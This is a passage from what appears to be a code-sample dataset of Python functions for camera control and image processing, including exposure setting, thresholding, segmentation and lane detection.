camera.setProperty(type=PyCapture2.PROPERTY_TYPE.SHUTTER,\r\n autoManualMode=False, absValue=shutter)\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.GAIN,\r\n autoManualMode=False, absValue=gain)", "def expose(self):\n\n ## Determine type of exposure (exp, series, stack)\n exptype = str(self.exptypeComboBox.currentText())\n mode = self.modedict[exptype]\n\n ## Get exposure parameters\n if mode == \"bias\":\n exptime = 0.0\n else:\n exptime = self.exptimeSpinBox.value()\n imcount = self.imstackSpinBox.value()\n seqnum = self.imnumSpinBox.value()\n mintime = self.minexpSpinBox.value()\n maxtime = self.maxexpSpinBox.value()\n step = self.tstepSpinBox.value()\n\n ## Determine filter kwargs\n if self.filterToggleButton.isChecked():\n kwargs = {'filter_name' : str(self.filterComboBox.currentText())}\n else:\n kwargs = {'monowl' : self.monoSpinBox.value()}\n\n if self.testimCheckBox.isChecked():\n title = 'test'\n else:\n title = str(self.imtitleLineEdit.text())\n\n ## Build filepath\n filepath = os.path.join(str(self.imfilenameLineEdit.text()),title)\n \n ## Check if single exposure\n if exptype in [\"Exposure\", \"Dark\", \"Bias\"]:\n\n ## Perform exposure\n self.logger.info(\"Starting {0}s {1} image.\".format(exptime, exptype))\n self.image_start.emit(1)\n\n try:\n filename = exposure.im_acq(mode, filepath, exptime, seqnum, **kwargs)\n self.image_taken.emit(1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken\".format(mode))\n except IOError:\n self.logger.exception(\"File already exits. Image not taken.\")\n else:\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.seqnum_inc.emit(seqnum)\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename,\n '-zoom', 'to', 'fit', '-cmap', 'b'])\n\n ## Check if a stack of exposures of same type\n elif exptype in [\"Exposure Stack\", \"Dark Stack\", \"Bias Stack\"]:\n\n total = seqnum + imcount\n self.logger.info(\"Starting {0}s {1} stack.\".format(exptime, exptype))\n self.image_start.emit(imcount)\n\n try:\n for i in range(seqnum, total):\n self.logger.info(\"Starting image {0} of {1}.\".format(i+1-seqnum, imcount))\n filename = exposure.im_acq(mode, filepath, exptime, i, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1-seqnum)\n self.seqnum_inc.emit(i)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure stack finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n \n ## Check if a series of exposures of increase exposure time\n elif exptype in [\"Exposure Series\", \"Dark Series\"]:\n\n ## Parameter checks\n if mintime > maxtime:\n self.logger.warning(\"Minimum time must be less than Maximum time. Series not started.\")\n return\n elif step <= 0:\n self.logger.warning(\"Time step must be greater than 0. Series not started.\")\n return\n\n ## Construct array of exposure times\n t = mintime\n time_array = []\n while t <= maxtime:\n time_array.append(t)\n t += step\n \n ## Perform series\n self.logger.info(\"Starting {0} series with mintime {1}, maxtime {2}, and step {3}.\".format(exptype, mintime, maxtime, step))\n self.image_start.emit(len(time_array))\n \n try:\n for i, time in enumerate(time_array):\n self.logger.info(\"Starting {0}s {1} image.\".format(time, mode))\n filename = exposure.im_acq(mode, filepath, time, seqnum, **kwargs)\n self.logger.info(\"Exposure {0} finished successfully.\".format(filename))\n self.image_taken.emit(i+1)\n except subprocess.CalledProcessError:\n self.logger.exception(\"Error in executable {0}_acq. Image not taken.\".format(mode))\n except OSError:\n self.logger.exception(\"Executable {0}_acq not found. Image not taken.\".format(mode))\n except IOError:\n self.logger.exception(\"File already exists. Image not taken.\")\n else:\n self.logger.info(\"Exposure series finished successfully.\")\n subprocess.Popen(['ds9', '-mosaicimage', 'iraf', filename, '-zoom', 'to', 'fit', '-cmap', 'b'])\n self.seqnum_inc.emit(seqnum)", "def constrain_roi(self, frame):\n raise NotImplementedError", "def endexposureloop(self):\n self.max_exposures = self.current_exposure", "def adjust(self, image):\n ...", "def segment_and_find_positions(self):\n initial_image = self.data\n xdim = self.data.shape[0]\n\n ydim = self.data.shape[1]\n downsized_image = transform.resize(\n initial_image,\n (xdim / DOWNSCALING_FACTOR, ydim / DOWNSCALING_FACTOR),\n mode=\"constant\",\n )\n rescaled_image = exposure.rescale_intensity(downsized_image)\n print(\"Starting Canny filtering\")\n g_edges = skimage.feature.canny(\n rescaled_image,\n sigma=self.canny_sigma,\n low_threshold=self.canny_low_threshold,\n )\n print(\"Starting dilation\")\n dilation = morphology.dilation(g_edges, morphology.disk(3))\n print(\"Starting erosion\")\n eroded = morphology.erosion(dilation, morphology.disk(4))\n dilation = morphology.dilation(\n eroded, morphology.diamond(4)\n ) # Dont change to disk\n print(\"Starting to remove small holes\")\n filled = morphology.remove_small_holes(\n dilation, area_threshold=self.remove_small_holes_area_threshold\n )\n print(\"Starting erosion\")\n eroded = morphology.erosion(filled, morphology.diamond(3))\n print(\"Applying filters\")\n filtered_image = eroded\n if self.colony_filters_dict is not None:\n for filter_name in self.colony_filters_dict.keys():\n filtered_image = segmentation_filters.apply_filter(\n filter_name, filtered_image, self.colony_filters_dict[filter_name]\n )\n\n colony_edges = morphology.dilation(feature.canny(filtered_image, 0.01))\n print(\"Starting outlining\")\n outline = downsized_image.copy()\n outline[colony_edges] = 65535\n distance = ndimage.distance_transform_edt(filtered_image)\n smoothed_well = ndimage.gaussian_filter(downsized_image, 0.35)\n outline.copy()\n objs, num_objs = ndimage.label(filtered_image)\n print(\"Applying filters for points\")\n if self.mode == \"A\":\n # point selection: Smoothest point in the center region\n for obj in range(1, num_objs + 1):\n print(\"On object {} of {}\".format(obj, num_objs))\n mask = objs == obj\n dist_mask = distance * mask\n # for each colony,\n # find the maximum distance from the two fold distance map.\n # The edge is at 0% and the center of the colony is at 100%\n d_max = dist_mask.max()\n # Getting the points which is at least 40% away from the edge\n top_percent = dist_mask > (d_max * 0.40)\n colony_mask = smoothed_well * top_percent\n colony_edges = feature.canny(colony_mask, 0.1)\n # applying the second distance transform\n # to find the smoothest point in the correct region\n inner_edges = ndimage.distance_transform_edt(\n ~colony_edges * top_percent\n )\n smooth_point = numpy.where(inner_edges == inner_edges.max())\n smooth_point = (smooth_point[0][0], smooth_point[1][0])\n smooth_point_corrected = (\n smooth_point[0] * DOWNSCALING_FACTOR,\n smooth_point[1] * DOWNSCALING_FACTOR,\n )\n self._point_locations.append(smooth_point_corrected)\n elif self.mode == \"C\":\n for obj in range(1, num_objs + 1):\n print(\"On object {} of {}\".format(obj, num_objs))\n mask = objs == obj\n dist_mask = distance * mask\n # point selection: edge, ridge & center respectively\n self.get_mode_c_points(dist_mask, 0, 0.03)\n self.get_mode_c_points(dist_mask, 0.15, 0.20)\n self.get_mode_c_points(dist_mask, 0.90, 0.99)", "def filter_mentor_advise(image):\n HSV = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n\n # For yellow\n yellow = cv2.inRange(HSV, (20, 100, 100), (50, 255, 255))\n\n # For white\n sensitivity_1 = 68\n white = cv2.inRange(HSV, (0,0,255-sensitivity_1), (255,20,255))\n\n sensitivity_2 = 60\n HSL = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n white_2 = cv2.inRange(HSL, (0,255-sensitivity_2,0), (255,255,sensitivity_2))\n white_3 = cv2.inRange(image, (200,200,200), (255,255,255))\n\n bit_layer = yellow | white | white_2 | white_3\n\n return bit_layer", "def mouseRange(event, x, y, flags, param):\n \n #If the left button was clicked\n if event==cv.CV_EVENT_LBUTTONDOWN:\n print \"x, y are\", x, y\n pixel_val= D.image[y,x]\n print \"the pixel's depth value is\", pixel_val\n if D.mode == \"setLeft\":\n D.dot1 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setRight\":\n D.dot2 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setTop\":\n D.dot3 = (x,y)\n D.mode = D.lastmode\n elif D.mode == \"setDown\":\n D.dot4 = (x,y)\n D.mode = D.lastmode", "def setup_hsv_boundaries():\n global l_hsv_thresh, u_hsv_thresh\n cv2.destroyAllWindows()\n l_hsv_thresh, u_hsv_thresh = prompt_calibration()\n cv2.destroyAllWindows()", "def find_components_old(image,deltaPix,lens_rad_arcsec = 5.0,lens_rad_ratio = None, gal_rad_ratio = 0.1,min_size_arcsec=0.3,thresh=0.4, show_locations=False):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n filtered = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.)\n \n# print(filtered.min(),filtered.max(),filtered.min() + thresh * np.abs(filtered.min()))\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n \n if show_locations:\n plt.figure(figsize = (8,8))\n plt.subplot(1,2,1)\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n plt.title('Image')\n\n plt.subplot(1,2,2)\n plt.imshow(filtered, origin='lower', norm=SymLogNorm(5))\n plt.title('Filtered Image')\n plt.show()\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0)\n max_idx_2d_large = peak_local_max(filtered, min_distance=1)\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2.\n \n R = np.sqrt((x_list_large - im_center_x)**2 + (y_list_large - im_center_y)**2)\n new_center_x, new_center_y = x_list_large[R < gal_rad], y_list_large[R < gal_rad]\n \n if (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) ==1 ): \n new_center_x, new_center_y = x_list_large[R == R.min()], y_list_large[R == R.min()]\n elif (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) > 1 ): \n new_center_x, new_center_y = im_center_x, im_center_y\n elif len(new_center_x) == 0: \n new_center_x, new_center_y = im_center_x, im_center_y\n \n \n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2)\n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n # show maxima on image for debug\n if show_locations:\n fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n plt.scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n plt.scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n plt.gcf().gca().add_artist(draw_lens_circle)\n plt.gcf().gca().add_artist(draw_gal_circle)\n plt.title('Detected Components')\n plt.text(1, 1, \"detected components\", color='red')\n fig.axes[0].get_xaxis().set_visible(True); fig.axes[0].get_yaxis().set_visible(True)\n plt.show()\n return (x_sats, y_sats), (new_center_x, new_center_y)", "def clip(self, image, x=0, y=0, w=0, h=0, oX=0, oY=0):\n if(w==0):\n w = image.get_rect()[2]\n if(h==0):\n h = image.get_rect()[3]\n needleW = w + 2*math.sqrt(oX*oX)\n needleH = h + 2*math.sqrt(oY*oY)\n imageOut = pygame.Surface((needleW, needleH))\n imageOut.fill((255,255,0))\n imageOut.set_colorkey((255,255,0))\n imageOut.blit(image, (needleW/2-w/2+oX, needleH/2-h/2+oY), pygame.Rect(x,y,w,h))\n return imageOut", "def ring_ext(self, tissue):\n print(\"controller - ring_ext!\")\n img_cv2_mask = self.pressure_img.mask\n self.pressure_img.roi_crop(img_cv2_mask, tissue, 1)", "def configure_exposure(cam,exposure):\n\n #print(\"*** CONFIGURING EXPOSURE ***\\n\")\n\n try:\n result = True\n\n # Turn off automatic exposure mode\n #\n # *** NOTES ***\n # Automatic exposure prevents the manual configuration of exposure\n # times and needs to be turned off for this example. Enumerations\n # representing entry nodes have been added to QuickSpin. This allows\n # for the much easier setting of enumeration nodes to new values.\n #\n # The naming convention of QuickSpin enums is the name of the\n # enumeration node followed by an underscore and the symbolic of\n # the entry node. Selecting \"Off\" on the \"ExposureAuto\" node is\n # thus named \"ExposureAuto_Off\".\n #\n # *** LATER ***\n # Exposure time can be set automatically or manually as needed. This\n # example turns automatic exposure off to set it manually and back\n # on to return the camera to its default state.\n\n \n\n # Set exposure time manually; exposure time recorded in microseconds\n #\n # *** NOTES ***\n # Notice that the node is checked for availability and writability\n # prior to the setting of the node. In QuickSpin, availability and\n # writability are ensured by checking the access mode.\n #\n # Further, it is ensured that the desired exposure time does not exceed\n # the maximum. Exposure time is counted in microseconds - this can be\n # found out either by retrieving the unit with the GetUnit() method or\n # by checking SpinView.\n\n if cam.ExposureTime.GetAccessMode() != PySpin.RW:\n print(\"Unable to set exposure time. Aborting...\")\n return False\n\n # Ensure desired exposure time does not exceed the maximum\n exposure_time_to_set = exposure\n exposure_time_to_set = min(cam.ExposureTime.GetMax(), exposure_time_to_set)\n cam.ExposureTime.SetValue(exposure_time_to_set)\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result", "def changeExposure(cam=0, increment=None, value=None):\n try:\n if increment is not None:\n exposure = commands.getoutput(\"v4l2-ctl -d {} --get-ctrl exposure_absolute\".format(cam)).split()[1]\n exposure = int(exposure)\n exposure = max(0, exposure + increment)\n elif value is not None:\n exposure = max(0, value)\n else:\n raise Exception(\"increment or value must be an integer\")\n commands.getoutput(\"v4l2-ctl -d {} --set-ctrl exposure_absolute={}\".format(cam, exposure))\n print \"Exposure {}\".format(exposure)\n except Exception as e:\n print \"Failed to change exposure: {}\".format(e)", "def calibrate(cap, location):\n\n #Poisition and size of sensor\n [x, y, h, w] = location\n\n #show square to user and wait for key\n print(\"please, step away to clear the blue square displayed on screen and press q to continue\")\n while True:\n ret, frame = cap.read()\n cv2.namedWindow('Calibrate',cv2.WINDOW_NORMAL)\n show = cv2.rectangle(frame, (x,y), (x+w,y+h), (255, 0, 0) , 5)\n cv2.imshow('Calibrate', show)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n\n #get first image, process and define window previous for iteration\n ret, frame = cap.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.GaussianBlur(frame, (7,7), 0)\n previous = frame[y:y+w,x:x+h]\n\n #set parameters for mean value of sensor, kernel of erode function,\n sampleNbMean = 50\n xi = np.empty((0, sampleNbMean))\n kernel = np.ones((5,5), np.uint8)\n\n #iterate over each frame until sample number\n for iteration in range(sampleNbMean):\n\n # Capture frame, draw the window and display to the user\n ret, frame = cap.read()\n # Image operation\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.GaussianBlur(frame, (7,7), 0)\n\n #get present window\n present = frame[y:y+w,x:x+h]\n\n #add sample for mean, add diference of window with prieviuos\n xi = np.append(xi,\n np.sum(\n cv2.erode(\n cv2.bitwise_xor(present,previous), kernel, iterations=1)))\n\n #present image becomes previous before steping into next image\n previous = present\n\n #mean\n mean = np.sum(xi)/len(xi)\n\n #sigma\n sum = 0\n for sample in xi:\n sum += np.power(sample - mean, 2)\n sigma = np.sqrt(sum/len(xi))\n\n #close window\n cv2.destroyWindow('Calibrate')\n\n return mean, sigma", "def change_zoom(self, b):\n\n x_mid = int(self.ff[0].info['xres'] / 2)\n y_mid = int(self.ff[0].info['yres'] / 2)\n\n x = x_mid - self.x_crop_slider.value\n\n if self.y_crop.value is True:\n y = y_mid - self.y_crop_slider.value\n else:\n y = y_mid - self.x_crop_slider.value\n\n x0 = x_mid - x\n x1 = x_mid + x\n y0 = y_mid - y\n y1 = y_mid + y\n\n self.x_range = [x0, x1]\n self.y_range = [y0, y1]\n\n self.ax.set_xlim([x0, x1])\n self.ax.set_ylim([y0, y1])", "def adjust_thresholding(self, pos_frame, which='animal'):\n\n cv2.namedWindow('Adjust Thresholding')\n if which == 'animal':\n cv2.createTrackbar('H_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_animal\"][2],\n 255,\n self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_animal\"][2],\n 255,\n self.nothing)\n elif which == 'material':\n cv2.createTrackbar('H_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][0],\n 255,\n self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][1],\n 255,\n self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"min_material\"][2],\n 255,\n self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding',\n self._args[\"tracking\"][\"thresholding\"][\"max_material\"][2],\n 255,\n self.nothing)\n else:\n utils.print_color_message(\"[INFO] Select 'animal' or 'material' to preview the default thresholding values\",\n \"darkgreen\")\n cv2.createTrackbar('H_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('H_High', 'Adjust Thresholding', 255, 255, self.nothing)\n cv2.createTrackbar('S_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('S_High', 'Adjust Thresholding', 255, 255, self.nothing)\n cv2.createTrackbar('V_Low', 'Adjust Thresholding', 0, 255, self.nothing)\n cv2.createTrackbar('V_High', 'Adjust Thresholding', 255, 255, self.nothing)\n\n test_frame = self._color_capture.get_frame(pos_frame)\n test_frame_cropped = test_frame[self.up_left_y:self.low_right_y, self.up_left_x:self.low_right_x]\n test_frame_cropped_hsv = cv2.cvtColor(test_frame_cropped, cv2.COLOR_BGR2HSV)\n test_frame_blurred = cv2.blur(test_frame_cropped_hsv, (5, 5))\n\n while True:\n h_l = cv2.getTrackbarPos('H_Low', 'Adjust Thresholding')\n h_h = cv2.getTrackbarPos('H_High', 'Adjust Thresholding')\n s_l = cv2.getTrackbarPos('S_Low', 'Adjust Thresholding')\n s_h = cv2.getTrackbarPos('S_High', 'Adjust Thresholding')\n v_l = cv2.getTrackbarPos('V_Low', 'Adjust Thresholding')\n v_h = cv2.getTrackbarPos('V_High', 'Adjust Thresholding')\n test_mask_mouse = cv2.inRange(test_frame_blurred, (h_l, s_l, v_l), (h_h, s_h, v_h))\n overlay = cv2.bitwise_and(test_frame_cropped_hsv, test_frame_cropped_hsv, mask=test_mask_mouse)\n cv2.imshow('Adjust Thresholding', overlay)\n key = cv2.waitKey(10) & 0xFF\n if key == ord(\"q\"):\n break\n cv2.destroyAllWindows()\n for i in range(1, 5):\n cv2.waitKey(1)", "def trackObject(img, lower, upper):\n\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\tlower_col = np.array(lower)\n\tupper_col = np.array(upper)\n\tmask = cv2.inRange(hsv, lower_col, upper_col)\n\tres = cv2.bitwise_and(img, img, mask=mask)\n\treturn res", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def _get_closeup(self, idx):\n img_arr = p.getCameraImage(width=self._width,\n height=self._height,\n viewMatrix=self._view_matrix,\n projectionMatrix=self._proj_matrix)\n rgb = img_arr[2]\n depth = img_arr[3]\n min = 0.97\n max=1.0\n segmentation = img_arr[4]\n depth = np.reshape(depth, (self._height, self._width,1) )\n segmentation = np.reshape(segmentation, (self._height, self._width,1) )\n\n np_img_arr = np.reshape(rgb, (self._height, self._width, 4))\n np_img_arr = np_img_arr[:, :, :3].astype(np.float64)\n\n view_mat = np.asarray(self._view_matrix).reshape(4, 4)\n proj_mat = np.asarray(self._proj_matrix).reshape(4, 4)\n # pos = np.reshape(np.asarray(list(p.getBasePositionAndOrientation(self._objectUids[0])[0])+[1]), (4, 1))\n\n AABBs = np.zeros((len(self._objectUids), 2, 3))\n cls_ls = []\n \n for i, (_uid, _cls) in enumerate(zip(self._objectUids, self._objectClasses)):\n AABBs[i] = np.asarray(p.getAABB(_uid)).reshape(2, 3)\n cls_ls.append(NAME2IDX[_cls])\n\n # np.save('/home/tony/Desktop/obj_save/view_mat_'+str(self.img_save_cnt), view_mat)\n # np.save('/home/tony/Desktop/obj_save/proj_mat_'+str(self.img_save_cnt), proj_mat)\n # np.save('/home/tony/Desktop/obj_save/img_'+str(self.img_save_cnt), np_img_arr.astype(np.int16))\n # np.save('/home/tony/Desktop/obj_save/AABB_'+str(self.img_save_cnt), AABBs)\n # np.save('/home/tony/Desktop/obj_save/class_'+str(self.img_save_cnt), np.array(cls_ls))\n\n np.save(OUTPUT_DIR + '/closeup_' + str(self.img_save_cnt - 1) + '_' + str(idx), np_img_arr.astype(np.int16))\n dets = np.zeros((AABBs.shape[0], 5))\n for i in range(AABBs.shape[0]):\n dets[i, :4] = self.get_2d_bbox(AABBs[i], view_mat, proj_mat, IM_HEIGHT, IM_WIDTH)\n dets[i, 4] = int(cls_ls[i])\n # np.save(OUTPUT_DIR + '/annotation_'+str(self.img_save_cnt), dets)\n\n test = np.concatenate([np_img_arr[:, :, 0:2], segmentation], axis=-1)\n\n return test", "def testMatchSwarpBilinearExposure(self):\n self.compareToSwarp(\"bilinear\", useWarpExposure=True,\n useSubregion=False, useDeepCopy=True)", "def adjust_brightness(image, delta):\r\n return _clip(image + delta * 255)", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: {:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def blur_slide(self):\r\n std_input = self.horizontal.get() # Get the user STD input\r\n img = self.master.images[-1] # Select the displayed image for transformation\r\n blurred_image = blur.gaussian_blur(img, std_input) # Perform gaussian blurring on the input image\r\n self.master.display_image.display_image(img=blurred_image) # display the blurred image\r\n self.master.images.append(blurred_image) # Append the blurred image to the stack\r", "def process_image( slider_pos ):\n stor = cvCreateMemStorage(0);\n \n # Threshold the source image. This needful for cvFindContours().\n cvThreshold( image03, image02, slider_pos, 255, CV_THRESH_BINARY );\n \n # Find all contours.\n nb_contours, cont = cvFindContours (image02, stor, method=CV_CHAIN_APPROX_NONE)\n \n # Clear images. IPL use.\n cvZero(image02);\n cvZero(image04);\n \n if cont is not None:\n # This cycle draw all contours and approximate it by ellipses.\n for c in cont.hrange():\n count = c.total; # This is number point in contour\n\n # Number point must be more than or equal to 6 (for cvFitEllipse_32f). \n if( count < 6 ):\n continue;\n \n # Alloc memory for contour point set. \n PointArray = cvCreateMat(1, count, CV_32SC2)\n PointArray2D32f= cvCreateMat( 1, count, CV_32FC2)\n \n # Get contour point set.\n cvCvtSeqToArray(c, PointArray.data.ptr, cvSlice(0, CV_WHOLE_SEQ_END_INDEX));\n \n # Convert CvPoint set to CvBox2D32f set.\n cvConvert( PointArray, PointArray2D32f )\n \n box = CvBox2D()\n\n # Fits ellipse to current contour.\n box = cvFitEllipse2(PointArray2D32f);\n \n # Draw current contour.\n cvDrawContours(image04, c, CV_RGB(255,255,255), CV_RGB(255,255,255),0,1,8,cvPoint(0,0));\n \n # Convert ellipse data from float to integer representation.\n center = CvPoint()\n size = CvSize()\n center.x = cvRound(box.center.x);\n center.y = cvRound(box.center.y);\n size.width = cvRound(box.size.width*0.5);\n size.height = cvRound(box.size.height*0.5);\n box.angle = -box.angle;\n \n # Draw ellipse.\n cvEllipse(image04, center, size,\n box.angle, 0, 360,\n CV_RGB(0,0,255), 1, CV_AA, 0);\n \n # Show image. HighGUI use.\n cvShowImage( \"Result\", image04 );", "def filterInRange(frame, min, max, colorMode):\n\n tempFrame = cv2.cvtColor(frame, colorMode)\n\n mask = cv2.inRange(tempFrame, min, max)\n mask = 